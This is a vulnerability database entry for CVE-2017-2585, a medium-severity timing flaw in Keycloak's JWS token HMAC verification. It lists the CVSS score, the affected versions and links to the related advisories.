CVE-2017-2585

CWE-200Information ExposureCWE-3856 documents6 sources
Severity
5.9MEDIUM
EPSS
0.7%
top 28.65%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
3
Redhat KeycloakRED Hat, Inc. KeycloakRedhat Single Sign ON
Timeline
PublishedMar 12
Latest updateOct 18

Description

Red Hat Keycloak before version 2.5.1 has an implementation of HMAC verification for JWS tokens that uses a method that runs in non-constant time, potentially leaving the application vulnerable to timing attacks.

CVSS vector

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:NExploitability: 2.2 | Impact: 3.6

Affected Packages4 packages

NVDredhat/keycloak< 2.5.1
CVEListV5red_hat,_inc./keycloak2.5.1
NVDredhat/single_sign_on7.1, 7.2+1

🔴Vulnerability Details

3
GHSA
keycloak-core vulnerable to timing attacks against JWS token verification2018-10-18
OSV
keycloak-core vulnerable to timing attacks against JWS token verification2018-10-18
CVEList
CVE-2017-2585: Red Hat Keycloak before version 22018-03-12

📋Vendor Advisories

1
Red Hat
keycloak: timing attack in JWS signature verification2017-04-04

💬Community

1
Bugzilla
CVE-2017-2585 keycloak: timing attack in JWS signature verification2017-01-11
CVE-2017-2585 (MEDIUM CVSS 5.9) | Red Hat Keycloak before version 2.5 | cvebase.io